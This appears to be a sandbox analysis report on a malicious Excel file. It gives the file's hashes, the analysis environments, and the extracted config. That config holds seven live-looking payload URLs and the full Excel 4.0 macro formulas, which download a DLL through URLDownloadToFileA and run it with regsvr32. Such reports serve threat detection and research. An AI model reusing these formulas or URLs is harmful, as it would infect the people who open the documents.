General
-
Target
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088
-
Size
27KB
-
Sample
240909-1ls5mstenb
-
MD5
75b137eec11e92890485413127c2a34b
-
SHA1
ee5ad0c8f90e359b3620990047fb1d50ce9654a8
-
SHA256
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088
-
SHA512
cce5d37bd796a09d9a15cdeb077795f03017d08dc7466beae68e291075bff2702740ea3a6403d1a5ae4efe4dd8414297d917ab481b2b0f8cce04a8c6ce7a6883
-
SSDEEP
768:nCOv7JUnzEmD4ys2ewg4F32ByH3nFn1Kk8jI:CKdU4Y2JwZ/XFn4k8jI
Static task
static1
Behavioral task
behavioral1
Sample
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
http://henrysfreshroast.com/6cc4ts0bkrOlXq/
http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/
http://blog.centerking.top/wp-includes/DBq5jx/
http://polarrefrigeracao.com.br/fontes/y7QpO/
http://filmsetserie.dx.am/img/ghCY9J5KD1J/
https://vagbharati.in/wp-admin/nYBb/
http://advogadogoiania.com.br/wp-includes/O9Az4/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/6cc4ts0bkrOlXq/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.centerking.top/wp-includes/DBq5jx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://polarrefrigeracao.com.br/fontes/y7QpO/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://filmsetserie.dx.am/img/ghCY9J5KD1J/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vagbharati.in/wp-admin/nYBb/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/O9Az4/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()
Targets
-
-
Target
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088
-
Size
27KB
-
MD5
75b137eec11e92890485413127c2a34b
-
SHA1
ee5ad0c8f90e359b3620990047fb1d50ce9654a8
-
SHA256
ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088
-
SHA512
cce5d37bd796a09d9a15cdeb077795f03017d08dc7466beae68e291075bff2702740ea3a6403d1a5ae4efe4dd8414297d917ab481b2b0f8cce04a8c6ce7a6883
-
SSDEEP
768:nCOv7JUnzEmD4ys2ewg4F32ByH3nFn1Kk8jI:CKdU4Y2JwZ/XFn4k8jI
Score3/10 -